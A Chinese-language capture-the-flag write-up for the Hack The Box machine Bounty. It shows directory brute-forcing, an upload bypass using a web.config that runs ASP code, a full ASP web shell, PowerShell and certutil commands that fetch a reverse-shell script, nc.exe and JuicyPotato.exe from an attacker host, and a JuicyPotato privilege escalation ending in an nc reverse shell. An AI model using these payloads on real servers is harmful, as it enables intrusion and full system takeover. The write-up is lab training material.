预备知识
web.config文件上传、利用Nishang的Invoke-PowerShellTcp.ps1 反弹shell
JuicyPotato提权
信息收集和获取立足点
先用nmap简单扫下nmap 10.10.10.93
,扫出来结果很多,慢慢看看,因为开了80端口,所以先浏览器访问一下
之后用nikto也扫了下,还是没什么重要信息,只知道是asp,只能祭出爆破大法了,这里尝试一下老外常用的爆破工具gobuster,这里用dirbuster的字典(kali自带)
gobuster dir -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o Bounty -x aspx -q
输出结果
/transfer.aspx (Status: 200)
/UploadedFiles (Status: 301)
/uploadedFiles (Status: 301)
/uploadedfiles (Status: 301)
明显应该先访问页面http://10.10.10.93/transfer.aspx,发现可以上传文件,直接传aspx文件不合法,看来有校验,burp启动
试了会,找到了web.config文件可以上传
关于利用web.config实现攻击,可以参考这几篇文章
Upload a web.config File for Fun & Profit
Uploading web.config for Fun and Profit 2
Web.config在渗透中的作用
Create the Web.config file for an ASP.NET application
RCE by uploading a web.config
尝试web.config是否能执行,新建一个文件,内容如下
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
不过还是报错,报错信息如下
Server Error in '/' Application.
Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>
Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration>
根据报错信息进行修改,其实就是对着第二个给出的报错信息,然后修改defaultRedirect为web.config就行
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="web.config"/>
</system.web>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
上传成功,访问,不过服务器还是返回500,起码传上去了
再修改,发现是我这里的最后几行的&
不知道怎么复制错了,删了,内容如下
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="web.config"/>
</system.web>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
访问结果如下
在PayloadsAllTheThings找到了有一个web.config的shell,对照上面的进行修改一下,还发现一个问题,这个靶机的重置时间貌似有点问题,所以有时候就算上传成功也会报错,这种时候就很玄学
<?xml version="1.0″ encoding="UTF-8″?>
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="web.config"/>
</system.web>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!–
<% Response.write("-"&"->")
Response.write("</p>
<pre>")</p>
<p>Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("whoami")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing</p>
<p>Response.write(output1)
Response.write("</pre>
<p><!-"&"-") %>
–>
<!-- web.config payload from https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -->
额,这个shell也是500,不知道什么情况,只能根据之前的慢慢改,试一下ping
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c ping 10.10.14.3")
o = cmd.StdOut.Readall()
Response.write(o)
%>
本地先执行
sudo tcpdump icmp -i tun0
不过还是500,不清楚什么情况,而且一会就会404,所以应该有脚本在后台
复制一个Nishang的Invoke-PowerShellTcp.ps1。然后在末尾添加一行来反弹:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 443
最后把它起个http服务
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="web.config"/>
</system.web>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%@ Language=VBScript %>
<%
call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.3/Invoke-PowerShellTcp.ps1')")
%>
一直弹不回来,只能用之前的shell碰碰运气,注意这里的时间很短
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="web.config"/>
</system.web>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!--
<% Response.write("-"&"->")%>
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
<%Response.write("<!-"&"-") %>
-->
迅速执行下载,以下失败
certutil.exe -urlcache -f http://10.10.14.3/nc.exe C:\WINDOWS\TEMP\nc.exe
再换payload为
cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.3/Invoke-PowerShellTcp.ps1')
本地可以看到http是有请求的,但是就是执行不成功,可能是重置时间比我传过去时间快
过了一天,重新尝试,好家伙,发现是我打错了文件名,
权限提升
先看下系统信息,发现是2008,那么优先考虑juicypotato
PS C:\windows\system32\inetsrv>systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 12/18/2020, 8:30:13 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,597 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,597 MB
Virtual Memory: In Use: 498 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
查看权限whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
发现是可以的
CreateProcessWithToken (needs SeImpersonate)
CreateProcessAsUser (needs SeAssignPrimaryToken)
下载JuicyPotato和nc
certutil.exe -urlcache -f http://10.10.14.3/JuicyPotato.exe C:\WINDOWS\TEMP\JuicyPotato.exe
certutil.exe -urlcache -f http://10.10.14.3/nc.exe C:\WINDOWS\TEMP\nc.exe
本地nc新监听一个端口,然后回到shell执行
C:\WINDOWS\TEMP\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c C:\WINDOWS\TEMP\nc.exe -e cmd.exe 10.10.14.3 5555" -t *
插曲:user.txt 需要dir /a
才能发现